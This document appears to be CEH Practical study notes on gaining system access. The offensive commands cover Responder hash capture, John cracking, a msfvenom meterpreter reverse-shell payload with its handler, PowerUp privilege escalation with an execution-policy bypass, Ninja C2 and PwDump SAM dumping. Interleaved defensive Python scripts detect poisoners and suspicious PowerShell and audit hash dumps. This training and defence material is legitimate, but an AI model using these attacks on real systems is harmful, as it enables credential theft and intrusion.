# 1. Gain access to the system

## 1. Perform Active Online Attack to Crack the System’s Password using Responder

<figure><img src="/files/mxZt9ie4jHeO91xigaj9" alt=""><figcaption><p>LLMNR is link-local, UDP port 5355. NetBIOS-NS uses UDP port 137.</p></figcaption></figure>

LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are used to perform name resolution on the local link when DNS fails.

Responder is an LLMNR, NBT-NS and mDNS poisoner. By default the tool only responds to SMB requests.

Check the available interfaces:

```
ifconfig
```

Now run Responder on the interface facing the LAN:

```
sudo responder -I ens33
```

Now when a user on the LAN tries to access an unavailable share, Responder will answer the fallback name lookup and capture the NTLMv2 hash.

<figure><img src="/files/C8uNXr3SSsJpebX3ArNG" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/16eeQ3VYRvGHRtlAdbfh" alt=""><figcaption></figcaption></figure>
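A defender can detect an active poisoner with the same behaviour Responder relies on: a query for a name that does not exist should get no answer, so any host that answers is spoofing. The script below is an added example (not from these notes or the Responder project): it sends an LLMNR query for a random canary name to the multicast group and reports every host that replies. All function and variable names are my own; the live probe assumes you pass the IP of your LAN-facing interface.

```python
import os
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # IPv4 link-local multicast group used by LLMNR
LLMNR_PORT = 5355             # UDP port LLMNR listens on


def _encode_name(name: str) -> bytes:
    """DNS-style label encoding: length byte + label, terminated by a zero byte."""
    return b"".join(bytes([len(p)]) + p.encode("ascii") for p in name.split(".")) + b"\x00"


def _skip_name(data: bytes, pos: int) -> int:
    """Return the offset just past the name starting at `pos` (handles 0xC0 pointers)."""
    while True:
        length = data[pos]
        if length == 0:
            return pos + 1
        if length & 0xC0 == 0xC0:      # compression pointer: two bytes, ends the name
            return pos + 2
        pos += 1 + length


def build_llmnr_query(name: str, txid: int) -> bytes:
    """One-question LLMNR query for an A record; LLMNR reuses the DNS wire format."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + _encode_name(name) + struct.pack("!HH", 1, 1)   # QTYPE=A, QCLASS=IN


def build_llmnr_answer(query: bytes, ip: str, ttl: int = 30) -> bytes:
    """What a host (or a poisoner) sends back: same txid, QR bit set, one A record.
    Constructed here so the parser can be exercised without a live network."""
    txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + query[12:] + answer


def parse_llmnr_response(data: bytes, txid: int):
    """Return the IPv4 addresses answered for our txid, or None if `data` is not our reply."""
    if len(data) < 12:
        return None
    rid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000:    # wrong transaction or not a response
        return None
    pos = 12
    for _ in range(qd):                       # skip the echoed question(s)
        pos = _skip_name(data, pos) + 4
    addrs = []
    for _ in range(an):
        pos = _skip_name(data, pos)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
        pos += 10
        if rtype == 1 and rdlen == 4:
            addrs.append(socket.inet_ntoa(data[pos:pos + 4]))
        pos += rdlen
    return addrs


def probe_for_poisoner(local_ip: str, timeout: float = 2.0):
    """Send one canary LLMNR query out of the interface that owns `local_ip` and
    collect every (source_ip, answered_addresses) pair. A clean LAN returns []."""
    name = "canary-" + os.urandom(4).hex()        # no legitimate host has this name
    txid = int.from_bytes(os.urandom(2), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, socket.inet_aton(local_ip))
    sock.settimeout(timeout)
    hits = []
    try:
        sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        while True:
            data, (src, _port) = sock.recvfrom(2048)
            addrs = parse_llmnr_response(data, txid)
            if addrs is not None:
                hits.append((src, addrs))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits


if __name__ == "__main__":
    import sys
    iface_ip = sys.argv[1] if len(sys.argv) > 1 else "0.0.0.0"
    for src, addrs in probe_for_poisoner(iface_ip):
        print(f"LLMNR answer for a non-existent name from {src} -> {addrs}: possible poisoner")
```

Run it as `python3 llmnr_canary.py 192.168.1.20` from a monitoring host on the segment; repeating it on a schedule gives cheap, continuous coverage. The durable fix is to stop the fallback altogether: turn off LLMNR through Group Policy ("Turn off multicast name resolution" under DNS Client) and disable NetBIOS over TCP/IP on the adapters, so there is nothing for Responder to answer.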

Logs are stored in the logs folder under /usr/share/responder. The captured hash is written to an SMB-NTLMv2-SSP-&lt;victim IP&gt;.txt file. Now crack it with John.

On Ubuntu you can install John via snap and run it against the captured log:

```
sudo snap install john-the-ripper
sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt
```
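From the defender's side, the first thing to do with a Responder log found after an incident is to work out which accounts were exposed, because every one of them needs a password reset regardless of whether the hash cracks. The parser below is an added example (not part of these notes or of Responder): it validates the NetNTLMv2 line layout that Responder writes (`USER::DOMAIN:CHALLENGE:NTPROOF:BLOB`) and summarises the accounts per domain. The sample log lines are constructed with fake hex values; the function names are my own.

```python
import re
from collections import OrderedDict

HEX = re.compile(r"^[0-9A-Fa-f]+$")


def parse_netntlmv2_line(line: str):
    """Parse one Responder NetNTLMv2 log line (USER::DOMAIN:CHALLENGE:NTPROOF:BLOB).
    Returns a dict on success, or None if the line is not a well-formed record."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        return None
    user, _, domain, challenge, ntproof, blob = parts
    if not (len(challenge) == 16 and HEX.match(challenge)):        # 8-byte server challenge
        return None
    if not (len(ntproof) == 32 and HEX.match(ntproof)):            # 16-byte NTProofStr (HMAC-MD5)
        return None
    if not (HEX.match(blob) and blob.lower().startswith("0101")):  # NTLMv2 blob header
        return None
    return {"user": user, "domain": domain, "challenge": challenge,
            "ntproof": ntproof, "machine": user.endswith("$")}


def exposed_accounts(lines):
    """Summarise a Responder log: which (DOMAIN, user) pairs were exposed and how often,
    plus a count of lines that did not parse (truncated or otherwise damaged)."""
    seen = OrderedDict()
    malformed = 0
    for line in lines:
        if not line.strip():
            continue
        rec = parse_netntlmv2_line(line)
        if rec is None:
            malformed += 1
            continue
        key = (rec["domain"].upper(), rec["user"].lower())
        seen[key] = seen.get(key, 0) + 1
    return {"accounts": seen, "malformed": malformed}


# Constructed sample of what SMB-NTLMv2-SSP-<ip>.txt might contain (values are fake).
SAMPLE_LOG = """\
alice::CORP:1122334455667788:0123456789abcdef0123456789abcdef:01010000000000000000000000000000
alice::CORP:8877665544332211:fedcba9876543210fedcba9876543210:01010000000000000000000000000000
WS01$::CORP:aabbccddeeff0011:00112233445566778899aabbccddeeff:01010000000000000000000000000000
bob::CORP:not-a-hash
"""

if __name__ == "__main__":
    summary = exposed_accounts(SAMPLE_LOG.splitlines())
    for (domain, user), count in summary["accounts"].items():
        kind = "machine" if user.endswith("$") else "user"
        print(f"{domain}\\{user} ({kind}): {count} capture(s) -> reset credential")
    print(f"malformed lines skipped: {summary['malformed']}")
```

Each account appears once no matter how many times the hash was captured, and machine accounts (trailing `$`) are called out separately because they are rotated by the domain rather than by the user.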

## <mark style="color:red;">2. Audit system passwords using Lophtcrack</mark>

Windows tool. It can crack the other passwords on a remote machine over SMB if you know a single account on it. Use the password auditing wizard.

{% embed url="<https://l0phtcrack.gitlab.io/>" %}

## <mark style="color:red;">3. Find Vulnerabilities on exploit sites</mark>

{% embed url="<https://www.exploit-db.com/>" %}

## 4. Gain Access to a Remote System using Reverse Shell Generator

Create the msfvenom payload:

```
msfvenom -p windows/x64/meterpreter/reverse_tcp --platform windows -a x64 LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
```

Use Apache to host the file for download:

```
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
service apache2 start
```

Now run msfconsole and select the generic handler:

```
msfconsole
use exploit/multi/handler
```

Set the payload type, port and IP to match the msfvenom options, then visit the attacker IP from the target to download the executable. Run it and you will get the shell.

You can run the following commands in meterpreter.

```
sysinfo   # get system information
```

Upload a file through meterpreter.

The PowerSploit privilege escalation script is in /usr/share/windows-resources/powersploit:

```
upload PowerUp.ps1 powerup.ps1
```

Now drop into a command shell on the target:

```
shell
```

Now execute the script:

```
powershell -ExecutionPolicy bypass -command ". .\powerup.ps1;Invoke-AllChecks"
```

Now exit the shell; to get a VNC session from meterpreter use the following command.

```
run vnc
```

{% embed url="<https://www.revshells.com/>" %}
Also try the different shells from revshells.
{% endembed %}
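The last step of the chain above leaves a distinctive trail on the target: a `powershell.exe` process created with an execution policy bypass, dot-sourcing a script from the working directory, and calling `Invoke-AllChecks`. The detector below is an added example (not from these notes or from any of the tools named here): it scores process-creation command lines against a handful of such indicators and returns only the ones worth an analyst's time. The indicator weights and the alert threshold are my own choices, and the sample events are constructed.

```python
import re

# Each indicator: (name, weight, regex). Weights are rough triage scores, not a standard.
INDICATORS = [
    ("execution-policy-bypass", 3, re.compile(r"-(?:executionpolicy|ep|exec)\s+bypass", re.I)),
    ("no-profile", 1, re.compile(r"-(?:nop|noprofile)\b", re.I)),
    ("hidden-window", 2, re.compile(r"-(?:w|windowstyle)\s+hidden", re.I)),
    ("encoded-command", 4, re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("dot-sourced-local-script", 2, re.compile(r"(?:^|[\s\"'])\.\s+\.\\[\w.-]+\.ps1", re.I)),
    ("download-cradle", 4, re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I)),
    ("powerup-privesc", 4, re.compile(r"invoke-allchecks|powerup\.ps1", re.I)),
]
ALERT_THRESHOLD = 5
POWERSHELL = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?\b", re.I)


def score_command_line(cmdline: str):
    """Return (score, [matched indicator names]) for one process command line."""
    matched = [name for name, _w, rx in INDICATORS if rx.search(cmdline)]
    score = sum(w for name, w, _rx in INDICATORS if name in matched)
    return score, matched


def triage(events):
    """events: iterable of dicts with 'host', 'user' and 'cmdline' (e.g. from 4688 or
    Sysmon event 1). Returns the PowerShell launches that reach the alert threshold."""
    alerts = []
    for ev in events:
        if not POWERSHELL.search(ev["cmdline"]):
            continue
        score, matched = score_command_line(ev["cmdline"])
        if score >= ALERT_THRESHOLD:
            alerts.append({**ev, "score": score, "indicators": matched})
    return alerts


# Constructed process-creation events; the first is the exact command from the notes above.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\alice",
     "cmdline": 'powershell -ExecutionPolicy bypass -command ". .\\powerup.ps1;Invoke-AllChecks"'},
    {"host": "WS02", "user": "CORP\\svc_backup",
     "cmdline": "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\backup.ps1"},
    {"host": "WS03", "user": "CORP\\helpdesk",
     "cmdline": "powershell -ep bypass -File C:\\tools\\inventory.ps1"},
    {"host": "WS04", "user": "CORP\\bob",
     "cmdline": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "WS05", "user": "CORP\\carol",
     "cmdline": "notepad.exe C:\\Users\\carol\\notes.txt"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"[{alert['score']:>2}] {alert['host']} {alert['user']}: {', '.join(alert['indicators'])}")
```

The scoring is deliberately additive: an `-ExecutionPolicy bypass` on its own is common in legitimate admin scripts and stays below the threshold, while the combination with dot-sourcing and a known privilege-escalation tool name, or a hidden window with an encoded command, crosses it. In production the same logic belongs in a SIEM rule, with the command line taken from the process-creation event rather than from a list.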

## <mark style="color:red;">5. Gain access to a system using armitage</mark>

Armitage is a GUI front-end for Metasploit. Start the database it depends on first:

```
service postgresql start
```

Now run Armitage from the Applications menu. Run an intense scan, then create a payload suited to the target.

<figure><img src="/files/Nhu4a4ELfKqKtSn5yY7C" alt=""><figcaption></figcaption></figure>

Once the victim opens the payload, we get the session.

## <mark style="color:red;">6. Gain access to system using Ninja Jonin</mark>

Ninja is installed on the target and Jonin on the attacker machine.

{% embed url="<https://github.com/ErAz7/Ninja>" %}

We need to edit its config file to set the IP and port.

<figure><img src="/files/Qy49DaiAhv4HuKLeSHUY" alt=""><figcaption></figcaption></figure>

Open the Jonin listener; it will catch the sessions. Useful commands inside Jonin:

```
list        # list all sessions
connect 1   # connect to session 1
change      # then `cmd` to switch into a command prompt
cmd
help        # display help
```

## 7. Buffer Overflow

{% embed url="<https://thegreycorner.com/2011/03/11/simple-stack-based-buffer-overflow.html>" %}

{% embed url="<https://notes.cavementech.com/pentesting-quick-reference/buffer-overflow>" %}
Follow the detailed tutorial
{% endembed %}

**Tools required**

{% embed url="<https://github.com/stephenbradshaw/vulnserver>" %}

{% embed url="<https://debugger.immunityinc.com/>" %}

## <mark style="color:red;">8. System Password hacking</mark>

```
# Dump the Windows SAM hashes (run as administrator)
PwDump7.exe > hashes.txt
```
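The dump is only useful if someone reads it for the weaknesses a password audit is meant to find. The script below is an added example (not from these notes or from the pwdump tool): it parses the `user:rid:lmhash:nthash:::` lines and flags accounts that still store an LM hash, accounts with a blank password, and accounts that share the same NT hash (password reuse). The two well-known empty-password hash constants are real; the sample dump and the other hash values are constructed, and the function names are my own.

```python
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when LM storage is off / password empty
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password


def parse_pwdump_line(line: str):
    """user:rid:lmhash:nthash::: -> dict, or None for blank or malformed lines."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        return None
    return {"user": parts[0], "rid": int(parts[1]),
            "lm": parts[2].lower(), "nt": parts[3].lower()}


def audit_pwdump(lines):
    """Findings a password audit should surface from a SAM dump, as (subject, issue) pairs:
    LM hash storage, blank passwords, and identical NT hashes across accounts."""
    findings = []
    by_nt = {}
    for line in lines:
        rec = parse_pwdump_line(line)
        if rec is None:
            continue
        if rec["lm"] != EMPTY_LM:
            findings.append((rec["user"], "LM hash stored (weak, crackable)"))
        if rec["nt"] == EMPTY_NT:
            findings.append((rec["user"], "blank password"))
        by_nt.setdefault(rec["nt"], []).append(rec["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append((",".join(users), "same NT hash: password reuse"))
    return findings


# Constructed sample of hashes.txt; the non-empty hash values are fake.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0123456789abcdef0123456789abcdef:11111111111111111111111111111111:::
alice:1002:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::

"""

if __name__ == "__main__":
    for subject, issue in audit_pwdump(SAMPLE_DUMP.splitlines()):
        print(f"{subject}: {issue}")
```

An LM hash in the dump means the system still stores the legacy format, which is fixed with the "Do not store LAN Manager hash value on next password change" policy followed by a password change; shared NT hashes between a privileged and an unprivileged account are the finding that matters most, since compromising the weaker one yields the stronger.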

### CEH V13 Practical Preparation Course

{% embed url="<https://www.udemy.com/course/ethical-hacker-practical/?referralCode=289CF01CF51246BCAD6C>" %}
